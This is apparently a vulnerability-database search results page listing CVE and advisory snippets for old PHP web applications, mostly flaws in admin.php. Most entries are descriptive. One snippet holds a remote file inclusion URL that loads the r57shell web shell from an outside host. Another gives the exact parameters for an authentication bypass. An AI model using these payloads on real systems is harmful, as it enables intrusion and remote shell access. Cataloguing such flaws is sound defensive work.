1593 matches found
CVE-2006-3323
PHP remote file inclusion vulnerability in admin/admin.php in MF Piadas 1.0 allows remote attackers to execute arbitrary PHP code via the page parameter. NOTE: the same vector can be used for cross-site scripting, but CVE analysis suggests that this is resultant from file inclusion of HTML or...
CVE-2006-3323
MF Piadas 1.0 is affected by a PHP remote file inclusion in admin/admin.php, exploitable via the page parameter to execute arbitrary code. The underlying issue is a file inclusion vulnerability (HTML/script vector noted as related by CVE analysis). Connected advisories also reference cross-site s...
file include exploits in mcGuestbook 1.3
Multiple file include exploits in mcGuestbook 1.3 script type : mcGuestbook 1.3 bug found by : sweet-devil team : site-down type : file include exploits : admin.php http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt? ecrire.php...
Cross site scripting
Cross-site scripting (XSS) vulnerability in admin.php in Particle Links 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the username parameter...
CVE-2006-2903
CVE-2006-2903 describes a cross-site scripting (XSS) vulnerability in Particle Links 1.2.2, specifically in admin.php where the username parameter can be exploited to inject arbitrary script/HTML. The available references (e.g., NVD entry) list a low severity (CVSS v2 base 2.6) with network attac...
CVE-2006-2903
Cross-site scripting (XSS) vulnerability in admin.php in Particle Links 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the username parameter...
BloggIT <= 1.01 (admin.php) Arbitrary code execution
/ Federico Fazzi, [email protected] / BloggIT = 1.01 admin.php Arbitrary code execution / 04/06/2006 5:48 Bug: The BloggIT have on the admin.php: require"session.inc.php"; //- sessionstart; //- if $SESSION'login' != "ok" header"Location: index.php"; and require function don't include the fil...
CVE-2005-2466
OpenBook 1.2.2 is affected by multiple SQL injection vulnerabilities in the auth_user function of admin.php, allowing remote attackers to execute arbitrary SQL commands via the (1) username or (2) password parameter. The vulnerability is detailed in CVE-2005-2466 with a NVD base score of 6.4 (MED...
PT-2006-3777 · Mybloggie · Mybloggie
Name of the Vulnerable Software and Affected Versions: MyBloggie versions 2.1.1 and earlier Description: A remote file inclusion issue allows remote attackers to execute arbitrary PHP code via a URL in the mybloggie root path parameter to admin.php. The issue's validity has been disputed, with so...
CVE-2006-2726
PHP remote file inclusion vulnerability in Fastpublish CMS 1.6.9.d allows remote attackers to include arbitrary files via the configfsBase parameter in (1) drucken.php, (2) drucken2.php, (3) emailanbenutzer.php, (4) rechnung.php, (5) suche/search.php and (6) adminbereich/admin.php...
Remote file inclusion
PHP remote file inclusion vulnerability in Fastpublish CMS 1.6.9.d allows remote attackers to include arbitrary files via the configfsBase parameter in (1) drucken.php, (2) drucken2.php, (3) emailanbenutzer.php, (4) rechnung.php, (5) suche/search.php and (6) adminbereich/admin.php...
CVE-2006-2635
Multiple cross-site scripting (XSS) vulnerabilities in Tikiwiki (aka Tiki CMS/Groupware) 1.9.x allow remote attackers to inject arbitrary web script or HTML via malformed nested HTML tags such as "ipt" in (1) offset and (2) days parameters in (a) tiki-lastchanges.php, the (3) find and (4) offset parameters in ...
CVE-2006-2566
Alstrasoft Article Manager Pro 1.6 allows remote attackers to obtain sensitive information via (1) a quote character or possibly an invalid value in the action parameter in a request to mrarticles.php or (2) a login QUERYSTRING to admin.php without any additional parameters, which reveal the path in...
CVE-2006-2527
CVE-2006-2527 affects phpBazar 2.1.0 and earlier. The vulnerability in Admin/admin.php allows remote attackers to bypass authentication and gain unauthorized access to the administrative section by setting the action parameter to edit_member and the value parameter to 1. The description indicates...
BoastMachine 3.1 - admin.php Cross-Site Scripting
BoastMachine 3.1 - admin.php Cross-Site Scripting source: https://www.securityfocus.com/bid/18012/info BoastMachine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute...
Design/Logic Flaw
PlaNet Concept plaNetStat 20050127 allows remote attackers to gain administrative privileges, and view and configure log files, via a direct request to the (1) admin.php or (2) settings.php page...
Cross site scripting
Multiple cross-site scripting (XSS) vulnerabilities in FarsiNews 2.5.3 Pro and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) month and (2) year parameters in (a) index.php, and the (3) mod parameter in (b) admin.php...
CVE-2006-2091
admin.php in Virtual War (VWar) 1.5 and versions before 1.2 allows remote attackers to obtain sensitive information via an invalid vwarroot parameter, which reveals the path in an error message...
CVE-2006-2084
Multiple cross-site scripting (XSS) vulnerabilities in FarsiNews 2.5.3 Pro and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) month and (2) year parameters in (a) index.php, and the (3) mod parameter in (b) admin.php...